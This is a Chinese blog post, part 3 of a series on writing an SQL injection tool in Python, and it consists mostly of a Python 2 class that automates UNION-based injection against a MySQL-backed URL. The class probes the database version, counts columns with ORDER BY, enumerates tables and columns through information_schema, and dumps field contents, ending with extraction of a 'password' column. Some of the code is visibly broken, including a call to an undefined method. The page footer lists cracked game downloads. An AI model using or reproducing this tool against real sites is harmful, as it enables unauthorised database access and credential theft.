Python编写SQL注入工具(3)
时间:2022-03-14 16:25
Mysql注入模块
#coding:gb2312
import urllib
import string
import binascii
import re
class mysqlInject():
def __init__(self,url):
self.db=‘database()‘
self.url=url #待检测的网址
self.dblen=0 #数据库的长度
self.counts=0 #字段数
self.tables=[] #表
self.dbname=‘‘
# 检测数据库的版本
def judgeVersion(self):
page=urllib.urlopen(self.url).read()
sql=string.join([self.url,"%20and%20mid(version(),1,1)=523%"],‘‘)
pagex=urllib.urlopen(self.url).read()
if page==pagex:
print ‘MYSQL版本:>5‘
else:
print ‘MYSQL版本<5‘
#检测字段数
def columnCounts(self):
page=urllib.urlopen(self.url).read()
for n in range(1,100):
sql=string.join([self.url,"%20order%20by%20",str(n)],‘‘)
pagex=urllib.urlopen(sql).read()
if n==1:
if page==pagex:
print ‘可以使用 order by 猜解‘
else:
print ‘不能使用order by 猜解‘
break
else:
if page!=pagex:
self.counts=n-1
print ‘字段数:‘,self.counts
break
if self.counts==0:
print ‘未能猜解出字段数!‘
#爆出当前数据库名,数据库用户
def inject5Content(self,sql):
url=self.url+‘%20and%201=2%20UNION%20SELECT%20‘
for x in range(1,self.counts+1):
if x!=1:
url+=‘,‘
url+=‘concat(0x25,‘
url+=sql
url+=‘,0x25)‘
pagec=urllib.urlopen(url).read()
reg="%[a-z,0-9,A-Z,.,\-,\\,@,:]*%"
regob = re.compile(reg, re.DOTALL)
result = regob.findall(pagec)
if len(result)!=0:
strings=result[1]
strings=strings[1:len(strings)-1]
return strings
def inject5TableNames(self,DB):
url=self.url+‘%20and%201=2%20UNION%20SELECT%20‘
for x in range(1,self.counts+1):
if x!=1:
url+=‘,‘
url+=‘concat(0x25,‘
url+=‘group_concat(distinct+table_name)‘
url+=‘,0x25)‘
url+=‘%20from%20information_schema.columns%20where%20table_schema=‘
url+=DB
pagec=urllib.urlopen(url).read()
reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"
regob = re.compile(reg, re.DOTALL)
result = regob.findall(pagec)
if len(result)!=0:
strings=result[1]
strings=strings[1:len(strings)-1]
s=strings.split(‘,‘)
return s
#猜解字段名
def inject5ColumnsName(self,TB):
url=self.url+‘%20and%201=2%20UNION%20SELECT%20‘
for x in range(1,self.counts+1):
if x!=1:
url+=‘,‘
url+=‘concat(0x25,‘
url+=‘group_concat(distinct+column_name)‘
url+=‘,0x25)‘
url+=‘%20from%20information_schema.columns%20where%20table_name=‘
url+=TB
pagec=urllib.urlopen(url).read()
reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"
regob = re.compile(reg, re.DOTALL)
result = regob.findall(pagec)
if len(result)!=0:
strings=result[1]
strings=strings[1:len(strings)-1]
s=strings.split(‘,‘)
return s
#猜字段内容
def inject5CountContent(self,TN,CN):
url=self.url+‘%20and%201=2%20UNION%20SELECT%20‘
for x in range(1,self.counts+1):
if x!=1:
url+=‘,‘
url+=‘concat(0x25,‘
url+=CN
url+=‘,0x25)‘
url+=‘%20from%20‘
url+=TN
pagex=urllib.urlopen(url).read()
reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"
regob = re.compile(reg, re.DOTALL)
result = regob.findall(pagex)
if len(result)!=0:
strings=result[1]
strings=strings[1:len(strings)-1]
print CN,‘:‘,strings
#如果数据库的版本大于4,可以使用‘查‘表的方法注入
def inject5(self):
d=‘database()‘
self.database=self.inject5Content(d)
print self.database
database0x=binascii.b2a_hex(self.database)
database0x=‘0x‘+database0x
print database0x
self.inject5TableName(database0x)
self.inject5TableNames(database0x)
tb=self.tables[0]
print ‘‘
tb=binascii.b2a_hex(tb)
tb=‘0x‘+tb
print tb
self.inject5ColumnsName(tb)
self.inject5CountContent(‘gly‘,‘password‘)
热门排行
今日推荐
热门手游
-
艾诺迪亚破解版
版本:v1.3.2
大小:45.13MB
日期:2024-10-03
-
侠侣天下手机版
版本:v101
大小:274.8MB
日期:2024-10-03
-
特工17v21汉化版
版本:v0.21.7
大小:1997.58MB
日期:2024-10-03
-
仙剑安卓版
版本:v1.8.4
大小:21.16MB
日期:2024-10-03
-
five电子竞技经理破解版
版本:v1.0.24
大小:45.54MB
日期:2024-10-03
-
Lovecraft Locker国际服版
版本:v1.7.50
大小:332.84MB
日期:2024-10-03